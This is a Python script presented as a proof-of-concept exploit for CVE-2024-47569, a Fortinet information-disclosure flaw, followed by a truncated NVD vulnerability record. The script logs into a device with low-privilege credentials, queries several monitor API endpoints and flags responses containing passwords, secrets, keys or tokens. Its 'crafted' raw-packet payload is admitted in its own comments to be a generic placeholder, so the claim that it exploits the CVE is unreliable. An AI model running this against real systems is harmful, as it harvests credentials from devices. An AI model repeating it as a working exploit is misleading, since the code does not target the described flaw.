CVE-2024-47569

# CVE-2024-47569 PoC - Fortinet Sensitive Information Disclosure # Vulnerability: Insertion of Sensitive Information into Sent Data # Reference: https://fortiguard.fortinet.com/psirt/FG-IR-24-228 import requests import socket import struct from urllib.parse import urljoin class FortinetInfoDisclosure: """ PoC for CVE-2024-47569 Exploits sensitive information disclosure in Fortinet products via specially crafted packets. """ def __init__(self, target, port, username, password, protocol='https'): self.target = target self.port = port self.username = username self.password = password self.protocol = protocol self.base_url = f"{protocol}://{target}:{port}" self.session = requests.Session() self.session.verify = False def authenticate(self): """Authenticate to the Fortinet device with low-privilege credentials""" login_url = urljoin(self.base_url, '/logincheck') data = { 'username': self.username, 'password': self.password, 'ajax': '1' } try: resp = self.session.post(login_url, data=data, timeout=10) if resp.status_code == 200 and 'error' not in resp.text.lower(): print(f"[+] Successfully authenticated to {self.target}") return True except Exception as e: print(f"[-] Authentication failed: {e}") return False def exploit(self): """ Send specially crafted packets to trigger sensitive information disclosure. The vulnerability causes the device to embed sensitive information in response data. """ # Endpoint known to be affected by the info disclosure vulnerability target_endpoints = [ '/api/v2/monitor/system/status', '/api/v2/monitor/system/dns', '/api/v2/monitor/router/ipv4', '/api/v2/log/event/forward', '/api/v2/monitor/firewall/policy', '/api/v2/monitor/vpn/ipsec', ] disclosed_info = {} for endpoint in target_endpoints: url = urljoin(self.base_url, endpoint) try: # Craft a request with specific parameters to trigger info leak resp = self.session.get(url, timeout=10) if resp.status_code == 200: content = resp.json() if resp.headers.get('content-type', '').startswith('application/json') else resp.text # Check for sensitive data in response sensitive_patterns = ['serial', 'license', 'password', 'secret', 'private_key', 'token', 'credential'] for pattern in sensitive_patterns: if pattern.lower() in str(content).lower(): disclosed_info[endpoint] = content print(f"[!] Sensitive info found at {endpoint}: {pattern}") break except Exception as e: continue return disclosed_info def raw_packet_exploit(self): """ Alternative exploitation via raw TCP packets for non-HTTP services. Sends specially crafted binary packets to trigger the vulnerability. """ try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(10) sock.connect((self.target, self.port)) # Craft a specially formed packet to trigger info disclosure # The exact payload varies by Fortinet product and version payload = self._craft_payload() sock.send(payload) response = sock.recv(4096) print(f"[+] Raw response received ({len(response)} bytes)") # Decode and analyze response for sensitive data sock.close() return response except Exception as e: print(f"[-] Raw packet exploit failed: {e}") return None def _craft_payload(self): """Craft a specially crafted packet for the target service""" # This is a generic placeholder - actual payload depends on # specific Fortinet product and vulnerable code path return b'GET /api/v2/monitor/system/status HTTP/1.1\r\nHost: ' + \ self.target.encode() + b'\r\n\r\n' def main(): import urllib3 urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) # Configuration TARGET = "192.168.1.1" # Target Fortinet device IP PORT = 443 # HTTPS port USERNAME = "low_priv_user" # Low-privilege credentials PASSWORD = "password123" print(f"[*] CVE-2024-47569 PoC - Fortinet Sensitive Info Disclosure") print(f"[*] Target: {TARGET}:{PORT}") exploit_tool = FortinetInfoDisclosure(TARGET, PORT, USERNAME, PASSWORD) if exploit_tool.authenticate(): leaked_data = exploit_tool.exploit() if leaked_data: print(f"\n[!] Disclosed sensitive information:") for endpoint, data in leaked_data.items(): print(f" Endpoint: {endpoint}") print(f" Data: {str(data)[:200]}...") else: print("[-] No sensitive data disclosed") else: print("[-] Could not authenticate - valid credentials required") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2024-47569", "sourceIdentifier": "[email protected]", "published": "2025-10-14T16:15:35.327", "lastModified": "2026-01-14T10:16:02.987", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A insertion of sensitive information into sent data vulnerability in Fortinet FortiMail 7.4.0 through 7.4.2, FortiMail 7.2.0 through 7.2.6, FortiMail 7.0 all versions, FortiManager 7.6.0 through 7.6.1, FortiManager 7.4.1 through 7.4.3, FortiManager Cloud 7.4.1 through 7.4.3, FortiNDR 7.6.0 through 7.6.1, FortiNDR 7.4.0 through 7.4.8, FortiNDR 7.2 all versions, FortiNDR 7.1 all versions, FortiNDR 7.0 all versions, FortiNDR 1.5 all versions, FortiOS 7.6.0, FortiOS 7.4.0 through 7.4.4, FortiOS 7.2.0 through 7.2.8, FortiOS 7.0.0 through 7.0.15, FortiOS 6.4.0 through 6.4.15, FortiOS 6.2 all versions, FortiOS 6.0 all versions, FortiPAM 1.3 all versions, FortiPAM 1.2 all versions, FortiPAM 1.1 all versions, FortiPAM 1.0 all versions, FortiProxy 7.4.0 through 7.4.4, FortiProxy 7.2.0 through 7.2.10, FortiProxy 7.0 all versions, FortiProxy 2.0 all versions, FortiProxy 1.2 all versions, FortiProxy 1.1 all versions, FortiProxy 1.0 all versions, FortiRecorder 7.2.0 through 7.2.1, FortiRecorder 7.0.0 through 7.0.4, FortiTester 7.4.0 through 7.4.2, FortiTester 7.3 all versions, FortiTester 7.2 all versions, FortiTester 7.1 all versions, FortiTester 7.0 all versions, FortiTester 4.2 all versions, FortiVoice 7.0.0 through 7.0.4, FortiVoice 6.4.0 through 6.4.9, FortiVoice 6.0.7 through 6.0.12, FortiWeb 7.6.0, FortiWeb 7.4.0 through 7.4.4, FortiWeb 7.2 all versions, FortiWeb 7.0 all versions, FortiWeb 6.4 all versions allows attacker to disclose sensitive information via specially crafted packets."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-201"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.2.7", "matchCriteriaId": "108EB9C0-52F7-4A9C-962F-E01B5E2EB4F4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimail:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.3", "matchCriteriaId": "CF986D84-87F9-4314-8F9F-F6E962D1796D"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.1", "versionEndExcluding": "7.4.4", "matchCriteriaId": "7269FDB6-A1D4-4912-8751-87BA52614FDA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndExcluding": "7.6.2", "matchCriteriaId": "241A8930-4ADA-4380-AA42-F10B28487595"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.1", "versionEndExcluding": "7.4.4", "matchCriteriaId": "164DEDC3-B1C0-42AC-9ADB-CE03CF6A71CC"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortindr:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.5.0", "versionEndExcluding": "7.4.9", "matchCriteriaId": "8C26FBFC-8FE1-45CE-944C-D979DCC55D8E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:fortinet:fortindr:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.6.0", "versionEndIncluding": "7.6.2", "matchCriteriaId": "B121F0FB-8A14-4B65-9A84-85A79DD96C92"}]}]}, {"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0.0", "versionEndExcluding": "6.4.16", "matchCriteriaId": "B81974E2-B389-4A35-99F2-240FC140B08B"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.16", "matchCriteriaId": "3EAE013D-7AE4-4C7A-81A0-296FE00F12CD"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.2.0", "versionEndExcluding": "7.2.9", "matchCriteriaId": "678EB0FA-2B29-4108-8378-C4803A543193"}, {"vulnerable": true, "criteria": "cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.4.0", "versionEndExcluding": "7.4.5", "matchCriteriaId": "A71AD879-997D-4787-A1E9-E4132AC521E2"}, {"vulnerable ... (truncated)